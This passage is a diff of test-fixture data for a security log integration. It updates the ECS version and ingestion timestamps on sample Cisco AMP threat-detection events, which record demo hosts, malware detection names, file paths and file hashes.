"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1581,7 +1581,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1607,7 +1607,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581761565Z", + "ingested": "2021-09-13T18:06:53.271927056Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1664,7 +1664,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1690,7 +1690,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581763451Z", + "ingested": "2021-09-13T18:06:53.271928939Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1756,7 +1756,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1788,7 +1788,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581765334Z", + "ingested": "2021-09-13T18:06:53.271930862Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -1849,7 +1849,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1875,7 +1875,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581767207Z", + "ingested": "2021-09-13T18:06:53.271932733Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1941,7 +1941,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1973,7 +1973,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581769170Z", + "ingested": "2021-09-13T18:06:53.271934727Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -2034,7 +2034,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2060,7 +2060,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581771127Z", + "ingested": "2021-09-13T18:06:53.271936572Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2126,7 +2126,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2158,7 +2158,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581773027Z", + "ingested": "2021-09-13T18:06:53.271938451Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -2219,7 +2219,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2241,7 +2241,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581774895Z", + "ingested": "2021-09-13T18:06:53.271940356Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2307,7 +2307,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2339,7 +2339,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581776799Z", + "ingested": "2021-09-13T18:06:53.271942249Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -2400,7 +2400,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2422,7 +2422,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581778666Z", + "ingested": "2021-09-13T18:06:53.271944235Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2479,7 +2479,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2501,7 +2501,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581780563Z", + "ingested": "2021-09-13T18:06:53.271946131Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2558,7 +2558,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2590,7 +2590,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581782448Z", + "ingested": "2021-09-13T18:06:53.271948047Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2647,7 +2647,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2675,7 +2675,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581784321Z", + "ingested": "2021-09-13T18:06:53.271949953Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2732,7 +2732,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2764,7 +2764,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581786193Z", + "ingested": "2021-09-13T18:06:53.271951854Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat 